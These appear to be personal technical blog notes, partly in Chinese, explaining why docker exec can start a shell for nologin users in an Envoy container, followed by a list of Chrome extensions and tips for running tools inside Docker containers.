Take envoy image as an example, pull it and launch the container:

1
2
3
4
5
6
7
docker pull envoyproxy/envoy-dev:latest

docker run -d \
--name test \
--entrypoint=/bin/bash \
envoyproxy/envoy-dev:latest \
-c "tail -f /dev/null"

Get into the container by (note this is not a login operation! see below my question):

1
docker exec -it test bash

Check /etc/passwd file, the envoy is a nologin user:

1
envoy:x:101:101::/home/envoy:/usr/sbin/nologin

If you run su - envoy from any other users (even you enter the login password), you get error:

1
2
# su - envoy
This account is currently not available

From nologin man page, the description is clear: nologin displays a message that an account is not available and exits non-zero. It is intended as a replacement shell field to deny login access to an account. If the file /etc/nologin.txt exists, nologin displays its contents to the user instead of the default message. The exit code returned by nologin is always 1.

Sometimes you will also see /bin/false is used:

1
syslog:x:101:104::/home/syslog:/bin/false

They both have the same purpose, but nologin is preferred since it give you a friendly message. ssh, scp and other login services will not work if the user is nologin type on target machine.

BTW, You still can execute command as a nologin user:

1
2
3
sudo -u <nologin user name> bash -c "ls -ltr /tmp"
## or launch a shell
sudo -u <nologin user name> bash

Then I have a question here: Why docker exec command can launch shell with nologin user?. It turns out docker exec is not login action! It just starts a process in that PID namespace and it’s PPID is 1.

References

Does /usr/sbin/nologin as a login shell serve a security purpose? https://serverfault.com/questions/519215/what-is-the-difference-between-sbin-nologin-and-bin-false https://serverfault.com/questions/333321/executing-a-command-as-a-nologin-user Don’t sshd your container, this is a old post at early stage of docker and before docker exec, it uses nsenter to get a shell into container namespace.

Some useful Chrome extensions:

  • OneTab: 把多个tabs整理成列表在一个网页中,可分享。
  • Grammarly for Chrome: 英语语法检查。
  • SimpleUndoClose: 重新打开关闭的网页。
  • Screen Shader: 护眼模式,可调。
  • Dark Reader: 夜晚模式。
  • 清理大师Clean Master: 一键清理浏览器的缓存记录,可配置。
  • Octotree: 可以在侧边栏显示github 仓库代码的结构,点击跳转。
  • Tab Rsize: 拆分浏览器页面,方便对比查看内容。
  • JSON Formatter: 自动格式化JSON文件在浏览器中。
  • Awesome Autocomplete for GitHub: 搜索github项目时可自动补全,方便查找。
  • Wappalyzer: 识别当前网站所用的技术栈。
  • 扩展管理器Extension Manager: 插件统一管理工具。
  • ZenHub for GitHub: zenhub 的管理插件,需要登录。

这里主要记录一下docker container 一些有意思的用法。

Version Release

可以将源码封装到 docker(tag) 或者 helm chart 中,通过check-in pre/post-CI/CD pipeline 发布,然后在 K8s or Jenkins pipeline 中使用,这样整个流程就非常规范,易于管理。

Run in Background

之前一直通过更改--entrypoint/bin/sh 加上 -c "tail -f /dev/null"的方式,使容器在后台running,其实可以默认使用 -d(detach) 的方式,但必须了解entrypoint/cmd的设置,比如:

1
2
3
4
5
6
7
# the busybox build with CMD ["sh"], here it run as default sh
# and with -it, this container hang in background
docker run -itd busybox

# if image has entrypoint different than sh or bash, to make it idle
# we have to reset the entrypoint
docker run -itd --entrypoint=/bin/sh <image>:<tag>

Wrap Dependencies

把一些需要依赖的tool build到docker image中,然后运行docker container去工作,把需要处理的资源mount到container中: 比如 helm linter cv:

1
2
3
docker run --rm -it \
-v pathto/chart:/chart \
cv:latest cv lint helm /chart

Logs may also be captured by passing an additional volume: -v ~/path/to/logs:/tmp/cv

再比如jsonnet,搭建本地运行环境比较困难:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# check jsonnet help
docker run --rm -it bitnami/jsonnet:latest --help

# convert Chart.yaml.jsonnet to Chart.yaml
# -V: pass parameters to chart.yaml.jsonnet
# -S: plain text display
# sed -e 's/"//g': remove double quotes, but need to quote the version number

# the entrypoint is jsonnet cli
docker run \
--rm \
--user root \
-v pathto/Chart.yaml.jsonnet:/Chart.yaml.jsonnet \
bitnami/jsonnet:latest /Chart.yaml.jsonnet -V version="1.0.0" -S | sed -e 's/"//g'
0%